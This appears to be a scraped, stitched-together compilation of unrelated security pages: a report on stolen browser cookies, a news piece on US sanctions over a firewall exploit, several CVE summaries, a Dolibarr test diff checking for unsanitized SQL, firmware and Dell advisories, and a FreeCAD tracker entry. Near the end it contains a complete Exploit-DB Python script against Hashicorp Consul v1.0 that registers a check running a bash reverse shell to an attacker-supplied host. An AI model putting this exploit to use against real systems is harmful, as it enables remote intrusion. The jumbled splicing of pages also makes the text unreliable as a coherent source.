Cybersecurity experts warn of widespread data exposure as a recent investigation reveals a staggering number of internet cookies…

Cybersecurity experts warn of widespread data exposure as a recent investigation reveals a staggering number of internet cookies circulating on the dark web.

A new report from NordVPN highlights the severe privacy risks associated with web cookies, which are small files websites store on your device to remember your browsing activity. The research, conducted in partnership with threat exposure management platform, NordStellar, uncovered approximately 93.7 billion stolen cookies available for sale in underground online marketplaces.

Researchers analyzed data from Telegram channels between April 23 and April 30, 2025, resulting in a dataset of around 94 billion cookies. The researchers analyzed the cookies’ active or inactive status, malware used, country of origin, data content, the company, the user’s OS, and keyword categories assigned to users. NordVPN did not buy stolen cookies or access their contents, but only examined the data within them.

****What’s Inside the Digital Cookie Jar?****

The analysis of these stolen cookies revealed a treasure trove of personal data. When analyzing these stolen cookies, ‘ID’ (Assigned ID was associated with 18 billion cookies) and ‘session’ (associated with 1.2 billion cookies) were identified as the most common keywords, indicating the type of data they held.

These are crucial for maintaining active user sessions on websites, meaning a stolen session ID could grant an attacker direct access to an account without needing a password. Alarmingly, out of the total 93.7 billion stolen cookies analysed, 15.6 billion were still active, posing an immediate threat to users.

This vast collection of compromised data poses a significant threat to personal security, potentially allowing malicious actors to access sensitive information and online accounts. Beyond session data, the report reveals that compromised cookies frequently contained personal details such as names, email addresses, countries, cities, and even passwords.

This information can be exploited for targeted phishing attacks or, in more severe cases, identity theft. Here’s a breakdown of the data attackers can steal via cookies.

Source: NordVPN

****Where Did These Cookies Come From?****

The majority of these stolen cookies were traced back to several major online platforms and originated from a diverse set of countries. Google services alone accounted for over 4.5 billion cookies, with YouTube and Microsoft each contributing more than 1 billion. This indicates that widely used platforms are prime targets for cybercriminals due to the sheer volume of user data they handle.

The primary method of theft involved various types of malware, including infostealers, trojans, and keyloggers. Redline emerged as the most prolific, responsible for stealing almost 42 billion cookies. Check out the list of malicious software used to steal these cookies:

Source: NordVPN

****Protecting Your Digital Crumbs****

Given the widespread threat, cybersecurity experts advise users to take proactive steps to safeguard their online presence.

> _“Cookies may seem harmless, but in the wrong hands, they’re digital keys to our most private information. What was designed to enhance convenience is now a growing vulnerability exploited by cybercriminals worldwide.”_
> 
> Adrianus Warmenhoven, Cybersecurity Expert – NordVPN

Therefore, to stay safe, always be careful when accepting cookies on websites, opting to reject unnecessary ones, especially third-party trackers. Also, regularly clear cookies from your browser to limit the window of opportunity for attackers.

Furthermore, using security tools like anti-malware software and Virtual Private Networks (VPNs) can significantly enhance protection. It helps block malicious websites, scan downloads for threats, and encrypt internet traffic, making it harder for cybercriminals to snatch your digital cookies.

Nearly 94 Billion Stolen Cookies Found on Dark Web

Cross-site request forgery (CSRF) vulnerability in Smart Forms 2.6.15 and earlier allows remote attackers to hijack the authentication of administrators via a specially crafted page.

CVE-2019-5924: Smart Forms – when you need more than just a contact form

SUMMARY The United States has taken strong action against a Chinese cybersecurity company, Sichuan Silence Information Technology, for…

****SUMMARY****

*   **Sanctions on Chinese Firm:** The US sanctioned Sichuan Silence Information Technology and employee Guan Tianfeng for exploiting a firewall vulnerability in a major global cyberattack.

*   **Global Impact:** Between April 22–25, 2020, malware compromised 81,000 firewalls worldwide, including 23,000 in the US, targeting sensitive infrastructure.

*   **Zero-Day Exploit:** The attack leveraged a zero-day vulnerability, initially stealing credentials and later deploying ransomware like Ragnarok.

*   **Critical Incident:** A US energy company drilling operation narrowly avoided catastrophic damage due to the timely detection of the attack.

*   **Nation-State Links:** Sichuan Silence is connected to Chinese government agencies and high-profile cyber espionage campaigns, raising concerns about broader national security threats.

The United States has taken strong action against a Chinese cybersecurity company, Sichuan Silence Information Technology, for its role in a massive global cyberattack. The company, along with one of its employees, Guan Tianfeng, has been sanctioned for exploiting a critical vulnerability in a popular firewall product.

****The Background:****

Between April 22 and 25, 2020, Guan, a security researcher at Sichuan Silence, exploited a critical vulnerability, to deploy malicious software on approximately 81,000 firewalls globally, including 23,000 in the United States (36 of which were deployed to protect critical infrastructure).

This breach impacted thousands of businesses, including several critical infrastructure companies in the United States. The initial intent of the malware was to steal sensitive information, such as usernames and passwords. However, after the attack was discovered, the malware was modified to deploy ransomware, encrypting victims’ data and demanding a ransom for its decryption.

One particularly alarming incident mentioned by the US Treasury Department involved a US energy company engaged in active drilling operations. If this attack wasn’t detected and thwarted, it could have led to severe consequences, potentially including loss of life.

The attack, reportedly, leveraged a zero-day vulnerability. It was a previously unknown flaw that allowed the hackers to gain unauthorized access to the targeted systems. They then installed malware, including the destructive Ragnarok ransomware, on the compromised devices.

In response to this cyber threat, the US government has implemented a multi-faceted approach. The Treasury Department has imposed sanctions on Sichuan Silence and Guan, while the Justice Department has unsealed an indictment charging Guan with international hacking conspiracy.

> Guan Tianfeng is wanted by the #FBI on charges of conspiracy to commit computer fraud and conspiracy to commit wire fraud. The Rewards For Justice Program, US Department of State, offers a reward of up to $10 million for information: https://t.co/3XNEF6Gbxy pic.twitter.com/Pk4F22vMFK
> 
> — FBI Most Wanted (@FBIMostWanted) December 10, 2024

The indictment reveals that Sichuan Silence is a Chinese government contractor, providing services to the Ministry of Public Security and other state-run entities. The company has been linked to various cyber espionage and disinformation campaigns.

Sichuan Silence has a history of involvement in cyber espionage and disinformation campaigns. The company has been linked to several high-profile attacks, including those carried out by notorious hacking groups like APT41, APT31, and Volt Typhoon.

For your information, the indictment Last month, cybersecurity firm Sophos discovered a vulnerability in its XG Firewall product, CVE-2020-12271, used by Chinese hackers to install the Asnarök malware. The company collaborated with European law enforcement to confiscate the server that deployed the malware.

In addition, Sophos claimed to have observed years-long surveillance, sabotage, and cyberespionage campaigns targeting critical infrastructure and government targets in South and Southeast Asia, including airports, military hospitals, nuclear energy suppliers, state security apparatus, and federal ministries.

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4, shared the following comment with Hackread.com:

_“_This is a pretty serious, widely successful attack and generally, if you hear about a Chinese company intentionally compromising US critical infrastructure, you immediately think it must have been nation-state motivated and maybe that was also true of this case or it was like many supposed Chinese cybersecurity companies which are really offensive hacking entities, it was a bit of both or a target of opportunity, where Guan possibly shared his newly gained access to US critical infrastructure companies with the PRC._“_

Roger noted that _“_Installing ransomware is not typically a PRC objective. They don’t need to steal money and installing ransomware is increasing the odds of early detection. Hence, this does seem more an issue related to one individual, Guan, or his employer, versus a directed nation-state operation. I can’t see PRC handlers excited that Guan was installing unneeded malware that would only increase the odds of detection._“_

1.  **FBI-Wanted Hacker Arrested in Russia**
2.  **Russian National Jailed for Smuggling US Military Tech**
3.  **US Charges 5 MGM Hackers from Scattered Spider Gang**
4.  **Feds Bust N. Korean Identity Theft Ring Targeting US Firms**
5.  **US Takes Down Notorious Warzone RAT Malware Operation**

US Sanctions Chinese Cybersecurity Firm for Firewall Exploit, Ransomware Attacks

Cross-Site Request Forgery (CSRF) vulnerability in Sygnoos Popup Builder plugin <= 4.1.11 at WordPress allows an attacker to update plugin settings.

CVE-2022-29495: Popup Builder – Create highly converting, mobile friendly marketing popups.

dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command

@@ -328,9 +328,14 @@ public function testPHP()

$this\->assertTrue($ok, 'Found non escaped string in building of a sql request '.$file\['relativename'\].': '.$val\[0\].' - Bad.');

//exit;

  

// Check string 'IN (".xxx' or 'IN (\\'.xxx' with xxx that is not '$this->db->sanitize' and not '$db->sanitize'. It means we forget a db->sanitize when forging sql request.

preg\_match\_all('/ IN \\(\[\\'"\]\\s\*\\.\\s\*(.........)/i', $filecontent, $matches, PREG\_SET\_ORDER);

// Checks with IN

  

// Check string ' IN (".xxx' or ' IN (\\'.xxx' with xxx that is not '$this->db->sanitize' and not '$db->sanitize'. It means we forget a db->sanitize when forging sql request.

$ok\=true;

$matches\=array();

preg\_match\_all('/\\s+IN\\s\*\\(\[\\'"\]\\s\*\\.\\s\*(.........)/i', $filecontent, $matches, PREG\_SET\_ORDER);

foreach ($matches as $key => $val) {

//var\_dump($val);

if (!in\_array($val\[1\], array('$db->sani', '$this->db', 'getEntity', 'WON\\',\\'L', 'self::STA', 'Commande:', 'CommandeF', 'Entrepot:', 'Facture::', 'FactureFo', 'ExpenseRe', 'Societe::', 'Ticket::S'))) {

$ok\=false;

break;

@@ -341,9 +346,12 @@ public function testPHP()

$this\->assertTrue($ok, 'Found non sanitized string in building of a IN or NOT IN sql request '.$file\['relativename'\].' - Bad.');

//exit;

  

// Check string 'IN (\\'".xxx' with xxx that is not '$this->db->sanitize' and not '$db->sanitize'. It means we forget a db->sanitize when forging sql request.

preg\_match\_all('/ IN \\(\\'"\\s\*\\.\\s\*(.........)/i', $filecontent, $matches, PREG\_SET\_ORDER);

// Check string ' IN (\\'".xxx' with xxx that is not '$this->db->sanitize' and not '$db->sanitize'. It means we forget a db->sanitize when forging sql request.

$ok\=true;

$matches\=array();

preg\_match\_all('/\\s+IN\\s\*\\(\\'"\\s\*\\.\\s\*(.........)/i', $filecontent, $matches, PREG\_SET\_ORDER);

foreach ($matches as $key => $val) {

//var\_dump($val);

if (!in\_array($val\[1\], array('$db->sani', '$this->db', 'getEntity', 'WON\\',\\'L', 'self::STA', 'Commande:', 'CommandeF', 'Entrepot:', 'Facture::', 'FactureFo', 'ExpenseRe', 'Societe::', 'Ticket::S'))) {

$ok\=false;

break;

CVE-2022-0224: Fix #hunterf1d1ce3e-ca92-4c7b-b1b8-934e28eaa486 · Dolibarr/dolibarr@b9b45fb

Buffer overflow in system firmware for EDK II may allow unauthenticated user to potentially enable escalation of privilege and/or denial of service via network access.



*   Security Advisory
*   1\. Insecure Default Secure Boot Policy for Option ROMs
*   2\. Incorrect PKCS#1v1.5 Padding Verification for RSA Signature Check
*   3\. UEFI Variable “Reinstallation”
*   4\. Overwrite from Performance Data Variable
*   5\. CommBuffer SMM Overwrite/Exposure
*   6\. TOCTOU Issue with CommBuffer
*   7\. SMRAM Overwrite in Fault Tolerant Write SMI Handler
*   8\. SMRAM Overwrite in SmmVariableHandler
*   9\. Integer/Heap Overflow in SetVariable
*   10\. Heap Overflow in UpdateVariable
*   11\. Overwrite from FirmwarePerformance Variable
*   12\. Integer/Buffer Overflow in TpmDxe Driver
*   13\. Protection of PhysicalPresence Variable
*   14\. Boot Failure Related to UEFI Variable Usage
*   15\. Buffer Overflows in Capsule Update
*   16\. Boot Failure Related to TPM Measurements
*   17\. Buffer Overflow in Variable Reclaim
*   18\. Overflow in Processing of AuthVarKeyDatabase
*   19\. Counter Based Authenticated Variable Issue
*   20\. Honoring Memory Only Reset Control and correct MOR spec imlementation
*   21\. TCG PP S4 issue
*   22\. BIOS Password
*   23\. OPAL driver has PP issue on BlockSid
*   24\. OPAL driver has PSID issue
*   25\. DHCP misses boundary check for network packet
*   26\. SmmCore comm buffer check has TOCTOU issue
*   27\. UEFI Variable Deletion/Corruption
*   28\. EDK II Untested memory not covered by SMM page protection
*   29\. Unauthenticated Firmware Chain-of-Trust Bypass
*   30\. EDK II Authenticated Variable Bypass
*   31\. EDK II TianoCompress Bounds Checking Issues
*   32\. DNS Packet Size Check
*   33\. Opal BlockSid Setting Disabled after S3
*   34\. PartitionDxe and Udf Buffer Overflow
*   35\. Stack Overflow on Corrupted BMP
*   36\. Buffer Overflow in BlockIo service for RAM disk
*   37\. XHCI stack local stack overflow
*   38\. SW SMI Confused Deputy SmramSaveState.c
*   39\. Unlimited FV Recursion
*   40\. AuthVariable Timestamp Zeroing on APPEND\_WRITE
*   41\. BootGuard TOCTOU

*   Published with GitBook

**

Security Advisory

DRAFT \[07/20/2022 06:17:39\]

Version: .009.0

**

**

Security Advisory

DRAFT \[07/20/2022 06:17:39\]

Version: .009.0

**

CVE-2019-0160: 34. PartitionDxe and Udf Buffer Overflow · GitBook

The Path Sanity Check script of FreeCAD 0.19 is vulnerable to OS command injection, allowing an attacker to execute arbitrary commands via a crafted FCStd document.

![Dismiss Announcement](https://tracker.freecad.org/plugin_file.php?file=Announce/dismiss.png)

****⚠️ ATTENTION!!! ⚠️****

  
**(1)** First post to forum to verify issue  
**(2)** Link said thread to ticket and vice-a-versa  
**(3)** Use the most updated stable or development version  
**(4)** Post your **Help>About FreeCAD>Copy to clipboard** version info  
**(5)** Post a Step-By-Step explanation on how to recreate the issue  
**(6)** Upload an example file to demonstrate problem

**IMPORTANT: POST ONLY v0.20 BUG REPORTS**

*   Anonymous

Date Modified

Username

Field

Change

2021-12-23 15:48

eldstal

New Issue

2021-12-23 15:48

eldstal

Steps to Reproduce Updated

2021-12-23 15:56

eldstal

Tag Attached: security

2021-12-23 15:56

eldstal

Tag Attached: Path

2021-12-23 17:54

eldstal

Product Version

0.19 => 0.20

2021-12-28 22:36

chennes

Project

File formats => Path

2021-12-28 22:36

chennes

Category

Bug => General

2022-01-25 12:58

eldstal

Note Added: 0016287

CVE-2021-45845: 0004810: Security Vulnerability in PathSanity.py

Dell Trusted Device Agent, versions prior to 5.3.0, contain(s) an improper installation permissions vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to escalated privileges.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25542

Dell Trusted Device Agent, versions prior to 5.3.0, contain(s) an improper installation permissions vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to escalated privileges.

7.0

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Proprietary Code CVE(s)**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25542

Dell Trusted Device Agent, versions prior to 5.3.0, contain(s) an improper installation permissions vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to escalated privileges.

7.0

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

CVE(s) Addressed

Product

Affected Version(s)

Updated Version(s)

Link to Update

CVE-2023-25542

Dell Trusted Device Agent

Versions prior to 5.3.0  
 

5.3.0

https://www.dell.com/support/home/product-support/product/trusted-device/drivers

CVE(s) Addressed

Product

Affected Version(s)

Updated Version(s)

Link to Update

CVE-2023-25542

Dell Trusted Device Agent

Versions prior to 5.3.0  
 

5.3.0

https://www.dell.com/support/home/product-support/product/trusted-device/drivers

**Keinoja ongelman kiertämiseen tai lieventämiseen**

Uninstall and re-install Dell Trusted Device Agent with default settings.

**Kiitokset**

CVE-2023-25542: Dell Technologies would like to thank Marius Gabriel Mihai for reporting this issue.

**Versiohistoria**

Revision

Date

Description

1.0

2023-04-04

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

04 huhtik. 2023

CVE-2023-25542: DSA-2023-074: Dell Trusted Device Agent Security Update for an Improper Installation Permissions Vulnerability

Dell Command | Update, Dell Update, and Alienware Update versions before 4.6.0 and 4.7.1 contain Insecure Operation on Windows Junction in the installer component. A local malicious user may potentially exploit this vulnerability leading to arbitrary file delete.

**Vaikutus**

Medium

**Tiedot**

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell Command | Update  
 

Versions 4.6.0 and 4.7.1  
 

4.8.0  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Command | Update Application for Windows 10 | Driver Details | Dell US

Dell Update,  
Alienware Update

Versions 4.6.0 and 4.7.1

4.8.0  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Update, Alienware Update Application for Windows 10 | Driver Details | Dell US

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell Command | Update  
 

Versions 4.6.0 and 4.7.1  
 

4.8.0  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Command | Update Application for Windows 10 | Driver Details | Dell US

Dell Update,  
Alienware Update

Versions 4.6.0 and 4.7.1

4.8.0  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Update, Alienware Update Application for Windows 10 | Driver Details | Dell US

**Kiitokset**

CVE-2023-23698: Dell Technologies would like to thank ycdxsb for reporting this issue.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2023-02-06

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

06 helmik. 2023

CVE-2023-23698: DSA-2023-031: Dell Command | Update, Dell Update, and Alienware Update Security Update for a Windows Universal Application Vulnerability

Hashicorp Consul version 1.0 suffers from a remote command execution vulnerability.

    # Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)# Date: 26/10/2022# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://www.consul.io/# Description: Exploit for gain reverse shell on Remote Command Execution via API# References: https://www.consul.io/api/agent/service.html# Tested on: Ubuntu Server# Software Link: https://github.com/hashicorp/consulimport requests, sysif len(sys.argv) < 6:    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")    exit(1)target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"headers = {"X-Consul-Token": f"{sys.argv[5]}"}json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}try:    requests.put(target, headers=headers, json=json)    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")except:    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")

Search

lenovo warranty check/lookup | check warranty status | lenovo support us